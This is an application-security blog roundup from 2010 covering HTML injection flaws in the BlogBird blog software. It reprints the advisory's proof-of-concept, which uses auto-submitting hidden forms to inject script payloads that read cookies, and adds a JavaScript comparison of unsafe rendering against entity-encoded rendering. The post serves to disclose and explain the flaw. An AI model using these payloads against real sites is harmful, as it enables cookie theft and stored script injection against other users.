AppSec Blog

Weekly Roundup of @Risk Web Application Vulnerabilities

Volume: IX, Issue: 45
November 4, 2010


Summary of the vulnerabilities reported this week:

  • Web Application - Cross Site Scripting
  • Web Application

This Week's @Risk Spotlight

  • 10.45.29 - CVE: Not Available
  • Platform: Web Application
  • Title: BlogBird Multiple HTML Injection Issues
  • Description: BlogBird is a blog application. The application is exposed to multiple HTML injection issues because it fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/44465
The example exploit code shows two hidden form values (body and title) that are vulnerable to XSS; each payload closes the attribute it is stored in with `">` and then injects a script element:
<form action="http://www.blogbird.nl/elements/save/2648" method="post" name="main">
<input type="hidden" name="files_id" value="123">
<input type="hidden" name="type" value="posts">
<input type="hidden" name="column" value="col1">
<input type="hidden" name="title" value="post title">
<input type="hidden" name="element" value="post">
<input type="hidden" name="body" value='post text"><script>alert(document.cookie)</script>'>
<input type="hidden" name="extended" value="">
<input type="hidden" name="publish" value="1">
<input type="hidden" name="page" value="home">
<input type="hidden" name="author" value="author">
<input type="hidden" name="tags" value="">
</form>
<script>
document.main.submit();
</script>

<form action="http://www.blogbird.nl/settings/save" method="post" name="main">
<input type="hidden" name="title" value='My Blog Title"><script>alert(document.cookie)</script>'>
<input type="hidden" name="description" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="language" value="dutch">
<input type="hidden" name="date_format" value="">
<input type="hidden" name="per_page" value="0">
</form>
<script>
document.main.submit();
</script>


These parameter values are stored and later rendered into subsequent pages without output encoding, so the injected markup is sent back to other users' browsers and executes there. See the OWASP XSS Prevention Cheatsheet for more info.
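As an added example (not BlogBird's own code, which this post does not show), the following JavaScript contrasts a rendering routine that concatenates the stored title and body straight into markup with the same routine after OWASP-style HTML entity encoding. The post record and the page template are constructed for illustration; the payload strings are the ones quoted from the exploit above.

```javascript
// OWASP XSS Prevention Cheat Sheet rule for HTML element content and
// quoted attribute values: entity-encode & < > " ' and /.
function encodeForHtml(value) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Vulnerable rendering (the pattern the advisory describes): stored values are
// dropped into a hidden input's value attribute and into element content as-is.
function renderPostUnsafe(post) {
  return (
    `<input type="hidden" name="title" value="${post.title}">` +
    `<h1>${post.title}</h1><div class="body">${post.body}</div>`
  );
}

// Hardened rendering: every untrusted value is encoded before it is placed in
// the template, so the stored `">` can no longer close the attribute.
function renderPostSafe(post) {
  const title = encodeForHtml(post.title);
  const body = encodeForHtml(post.body);
  return (
    `<input type="hidden" name="title" value="${title}">` +
    `<h1>${title}</h1><div class="body">${body}</div>`
  );
}

// Check used to verify the two renderings: a raw <script tag in the output
// means the stored payload would execute in the viewer's browser.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed stored record carrying the advisory's two payloads.
const storedPost = {
  title: 'My Blog Title"><script>alert(document.cookie)</script>',
  body: 'post text"><script>alert(document.cookie)</script>',
};

console.log("unsafe executes:", containsInjectedScript(renderPostUnsafe(storedPost)));
console.log("safe executes:  ", containsInjectedScript(renderPostSafe(storedPost)));
```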
